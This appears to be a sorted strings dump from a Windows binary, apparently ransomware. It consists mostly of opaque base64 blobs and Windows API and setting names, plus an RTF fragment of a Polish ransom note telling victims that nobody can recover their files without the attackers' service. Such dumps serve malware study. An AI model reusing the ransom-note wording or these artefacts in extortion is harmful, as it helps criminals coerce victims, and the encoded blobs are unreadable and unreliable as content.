aKT D/DXw05uM3nsKZBSrFpwHeVpMmti7+YU8twUxi/fmETh29EoL5zY+hbjAfOhm7hi5Rx2pvGAqquVaFJmRwAIT3by2C9Wxr+nF6B/GvQVstWcvFtl4fODivFcF9UleKLaZrjGi1Vb3LPBVq7I3/PkvGvqiGVbUvij5UE9KbOFH/J/t+l+m6Sj6gyKn6HBgoDLjXfLpHryGK79wEkn/iR6+uL0JwRhihfRQsS5sFe193tX4Tf3r/9Sk6zSLA6AvMUsqU2ndylrj98y2jv1hNBQFIeWeqiomegyny4p6a5bOXVkPo5jvaZzwyTREVVbzvsq16mYPCn00euJ+E8I1OgCnKJ0Ycjipny8TwX6tJ2QvUROtiL+UNkiK847XVv2IQmo7eluLJALJxOnOx09qDvH7ma6Qrc3hI9gm/v+KwVvSSNizjrvPezj/hSaESPbMA8cDFLCiHK3+8Re7QcNdIwruULbvNMYHReW4ik827va2X1tPG5Q4M45z83Viz1HQRU+W/1MLFiunllzvUDqZfdMHpd8XzhbFGLLFQdyiTBJKnQW9QohiJIL2/0wNufrJppomx4hmRpjU+eiJCYoMHENCyLuE5oA6Uc6gORTQiz3Np5Pg6dvV9GX+QydQgSwRWrER7voykEBzV9Gh+zgU9ojACqCuSNvhZYt5ZzVQh/erePCYnH16wvWRTIQEClK8mXKSNAeJL6yWuRpcb1TbyWpw/OZGpWCTeeerYwHdgvxJgF8PGGilDTjtBJObZSAvq9rWdE8C03LC/wp92WIlt6e4RhiwtPC7UgQ+iV4g0sTXIjn71VGijhiWenZNw36R0dZPm0t8uHTMdq/Lrc0Ph+omA4T1LAz21vCMy+MKJBXO2ThykAozvOGs6JCtt40KA1iF8xMS3rZPwUwPsGHH3BkkdE9sCzggb7tkO3uWnoWgv9h92qU1TPNTI24xd7AMpliVrZcAUxL9HmystQHKXx2Jr1LaLXnRrMZs/USmneQd/k8f1rAK6VqKwRsNaecaKTv data error DefaultConnectionSettings DefaultRegistrationRefreshInterval DefaultRegistrationTTL Description DisableLocalOverride DisableReverseAddressRegistrations diskpart.exe DisplayScriptDownloadFailureUI DOMAIN error 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 e szukasz sposobu na odzyskanie plik\\'f3\\loch\\f31528 \\hich\\f31528 w, ale nie marnuj czasu. Nikt nie mo\\'bf\\loch\\f31528 \\hich\\f31528 e odzyska\\'e6\\loch\\f31528 \\hich\\f31528 plik\\'f3\\loch\\f31528 \\hich\\f31528 w bez naszej us\\'b3\\loch\\f31528 eb0q12gFGo/ONN8r2hYqxKJt7YHupl1DMeZPAdJTG87XnFHT3JdBjdKLsugH1Xwx4BMx3z4FVd8YFTI9syt/MySjeDhxjdM3gFKUjUF2APza3Ee55Mqa7PxGkE9QYt7g2Ps784Y7hxgynQD4IttfsgKt9hkOFexzMmv9jKwMGJFdN4RsqHu/4+AGmpAWblMb78iMLZkhd3IUwJA7f4nERdjVE99CqXCqh4Xuvb8gD16B0qeCsToEGCsZX9ZsdoSqFOVJXR38VLz1Tiw3ERUQfyhKkFtkRfahKoxsdIreCEjsYjCX7xm+CCCS6yG7D0OLmRnP6U9CFR+5I1YU3fUjR9NCPTldOI5VCQ7OXbNTPeSPg/vVd43jGuprhyv egBG5w80ES4y87bU4/qqs68FzC3JDcJ49Fr+SxZvwt7cJSXlTB0q1URstIaOe42wEBR0cUYuI6W2FsD4uAhpqR1oNMa+xKwbIC3trPe4ltf49PmhtKoqKQSk639NB15gNGctx7J8XmosACNLfld6BPKtWF3TAGQSYAiZbGGN9+8ofnCUAMygm16XakHXZgjdRMIJ5xjECQ9XzlWIh0Ni9z4w/+5rrYnIV4a9M5ujAF7QSNkkSVMDovLJLkteuQfqAl8RCR5l1Sdqv5bx/G6yrp1c8z26GYqQBtRb1Zci/u558hwYZk2yOLjpXfKEmbhLS3Dny8ptdLtcMNsbedBL/5jim9yanyvE88Z0Dm0iF2WypQn7+v8wwRdT+zG5w7y9aj0iKoacnl5aAKlIhxUSvy9fD1HBxSSuDxFjA9hIAAfZL+B2zKjQGAGIlg07Be5MhSDEi6H/JXtuWENyoTmDtnmkGF4JhTYgn7mvGWe1BeQyYRielt9My7b7jzGFEqgpTqKttw50NnvWBn+HZqry5grNDDsXmKbehjFjhlZpJFHiq+KS0keqOiszaJU0rWBTDA+TEFuBrAfk+XGRtb7af+HA+06ummMgFGyqyKi/UWvRXiHdRs/U8Ww1jJoKtuq5Yu9uWSI/LkajpW+Kq8apnXWVwWTtV3Hlq2Cp4XRIR2vNwICrGSD5TceNhYsz2lUleDof9eVVJrNi20fJcQrdTzmJkmn2VywrMiEOL+ZvhGOUvQl8zl/nPjvLpexxNYEHaLfU7/dnU1o4VSI6JNet3EgSIQ9FFQDAsX/ToMRHLV156BfxLwoxtHIky7qukCgLLEih9Bp3mQHUmKrt4+3QvddEemEhUF3Zr+rFdEktHoO2hIR8ZA1XZqcWZRXECqYrAT/YDYUY4I5ykFN7ldzQ2dOndwALuLNwYal4h2Xl00Nxqc5so+5ooQDnQH507sxcyFIOaGxMnV+7/Cl/VbdmoZpxvlGQIKNzO5anscMBvLg7Z1Yr/AZ9TmVxAspk7Oa egBG5w80ES4y87bU4/qqs68FzC3JDcJ49Fr+SxZvwt7cJSXlTB0q1URstIaOe42wEBR0cUYuI6W2FsD4uAhpqR1oNMa+xKwbIC3trPe4ltf49PmhtKoqKQSk639NB15gNGctx7J8XmosACNLfld6BPKtWF3TAGQSYAiZbGGN9+8ofnCUAMygm16XakHXZgjdRMIJ5xjECQ9XzlWIh0Ni9z4w/+5rrYnIV4a9M5ujAF7QSNkkSVMDovLJLkteuQfqAl8RCR5l1Sdqv5bx/G6yrp1c8z26GYqQBtRb1Zci/u558hwYZk2yOLjpXfKEmbhLS3Dny8ptdLtcMNsbedBL/5jim9yanyvE88Z0Dm0iF2WypQn7+v8wwRdT+zG5w7y9aj0iKoacnl5aAKlIhxUSvy9fD1HBxSSuDxFjA9hIAAfZL+B2zKjQGAGIlg07Be5MhSDEi6H/JXtuWENyoTmDtnmkGF4JhTYgn7mvGWe1BeQyYRielt9My7b7jzGFEqgpTqKttw50NnvWBn+HZqry5grNDDsXmKbehjFjhlZpJFHiq+KS0keqOiszaJU0rWBTDA+TEFuBrAfk+XGRtb7af+HA+06ummMgFGyqyKi/UWvRXiHdRs/U8Ww1jJoKtuq5Yu9uWSI/LkajpW+Kq8apnXWVwWTtV3Hlq2Cp4XRIR2vNwICrGSD5TceNhYsz2lUleDof9eVVJrNi20fJcQrdTzmJkmn2VywrMiEOL+ZvhGOUvQl8zl/nPjvLpexxNYEHaLfU7/dnU1o4VSI6JNet3EgSIQ9FFQDAsX/ToMRHLV156BfxLwoxtHIky7qukCgLLEih9Bp3mQHUmKrt4+3QvddEemEhUF3Zr+rFdEktHoO2hIR8ZA1XZqcWZRXECqYrAT/YDYUY4I5ykFN7ldzQ2dOndwALuLNwYal4h2Xl00Nxqc5so+5ooQDnQH507sxcyFIOaGxMnV+7/Cl/VbdmoZpxvlGQIKNzO5anscMBvLg7Z1Yr/AZ9TmVxAspk7Oak EnableAdapterDomainNameRegistration EnableHttp1_1 EnableHttpTrace EO79xX4ROZIpMXNMWxe3k0hYzxb8TwY1IgufxKVqbP4RQIHxWMMVmgzxYXOEhGuXgHttYwGtpyFECliqAulAYEJmy/VVl/AMfkoANrP1MjaHpgP1VCmQTrxW+19f0e1rda6HDDO9HoJzO7dbU/WKfHxV4FGwBp1tFY9WKX18W9pc1rOZqKNZe9dtKQ44Cp7QqUT8L1iuN7o5H7yN5bpIxljrCS/X+F8EHz1QlLPc99XW+iY0umLZK5ABm93iz517JaGI7oviUAmephhhTxpw7ZXIGcEzU2GF2jfoAZFgJyQ23IQkK8Lldhk+quhejzijWue/q2qFvywv34VNQ2uQRSspH9b4QaNlc3QHOSu0ZyWgl+pwn0I5pPo9IM8ywRTUyTNBQZiYQottLq7zy86jrMatDkNtTIpsZQ3lYH4E8Zg40Ny7j77wRVD+/5vCZtVFps+OupEvBMt9Zd5Cd9Ai4R5iZHYxFOcnnkjFZlRaPA9xUlFviGTcg4xvsh/e9CYOzDh66hrV1Njm0mKB1VOnZncnyhvpbYQKRC1HZkEeKnzRzv1J3Nm+MhWDZ5K5RRXs89Zf7rSBh34VOMt23PFErMrUdkRMXM1ymgfqpqmtHqlQl3H5N98o89BZfofLVR/aLqTRW eqQM0Kw2qj/DimszVvNsbOvXA/4D5nDfhhUX4d6WVFXtthZzswTVTJTCqWGTBaCRaeJDg1oTw5WcnbMdnSFxH6O6JpVxcN/FxvKXQoxIpoBFqcm/xl4fYkpUvqY9rq/92UORbBCPT3CCbWhOP3gJNl1GH8oSuHG7m2bygsKB67Hqk8JKuGzdpGygu00Q/Ytbttzk8rBIdBFi6Tj9GNf4KCdOsOFkl1IiF4mb7bjOLofP5/dBz85pDAIn5VuMi3JB5DcjnBoMITtM7sVuzeT8/uVzDtL+yzz/OqiO4bl9H+BGcrGG5jnlqLgI1dh1thymLio0OwifPa9oIXKscPKcgLGp9kxJ+w89y5JNC3fMvFTAwBmsmMZ1tiwRGNCwRCqI9G/aTX5sjOncf4Z5sobirIT26Cxovw88M/EcTA3cPoHbzwvMa94Bv0O+MCp4e+Nz9c4hcLSLxcj4yVDHO+on/Yx4rhnglhrZNsZQxIKC0BmUd8WQ8tL/8aNRqHuKEcgvcIRwFKrvGE8DjAvrxvUGxt/B9X6TQ+pRpD0ENlpV2yVqFqeJvInYgOguNQs9XTlteOjTLZX5tU97X/JoaVMN8zwAkgTjpIAKN4NQoXD670XEgTNsF7GswgsMIfDXDvTudKaon error EU7+Zet9ut3cE1l633CJQ6ThcqDbSdqUvtF/vsDYIvAgMQM9affu9mUxukShVG7grH+e8zKSxJBvgoJ95Ba9YW4xYFcjvZuQy75wRZRVtsIDtiQ3+l+u6Cn17XJUdrFteE6ABsovKGHDURoj4X/MilC2C9EmMdytDzraOXOoWg8aEHVyeyXijdOD4yw+T21PfksAzAIAgnkgUHerKBxmnzDOHgkuUCSl0OtLfm1ak73Z0fawxxmB0xhJ+1hW0gov8d3Tteji4kr4WgvnQ4YuFqpGL8Ijim+wLO86XIHm8IXr5oNxENi72j/02xtypsVXGdIBaVNBGuk5i1z8jcYXgZmHLKI7oSWaUk6fMt4ibo42Cdez3s6Cz04dWBg ExitProcess E}[\\+(aT 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 ffice/word/2003/wordml}}\\paperw12240\\paperh15840\\margl1501\\margr1502\\margt1701\\margb1440\\gutter0\\ltrsect fice/word/2003/wordml}}\\paperw11906\\paperh16838\\margl867\\margr867\\margt1440\\margb1440\\gutter0\\ltrsect file error FileDescription FileVersion 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 FlsGetValue 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 FrameMerging FrameTabWindow FtpDefaultExpiryTimeSecs FyvD/+d8KjQ+vZREmGxZ+/yKtIKXOsz9+pMo0OiDcvtF3PlEUS6xy7ekKLyUOWAWFoR9s+H2bIXCRIo/Jdns9MdGkdz8+tco7bthLrJghq4A46rewPPAV1vte6FLbSLJonwdvJda4x4RldJLN4mRCT4nZ3t7O8oI/ePQxRdVXrtGJ0OQ5HlQrbdkvR6R7+hr8VdXdUcfdnHbb1BfzJiGI/e6+DyAxsdl29vVlXV0cVx6dNEAIkOVnLPajGppXEoiUc7sGlzOdU52RJCjgIVLG5Q/eKkNO9LTendYxljGopQHZ2SJXus2AQl97m0T6kswRtRBzqKS1cRYKce1MXGWmjsiMIrLz8NerBzf2NnrmQSBxUTIuUPqxoxBajr 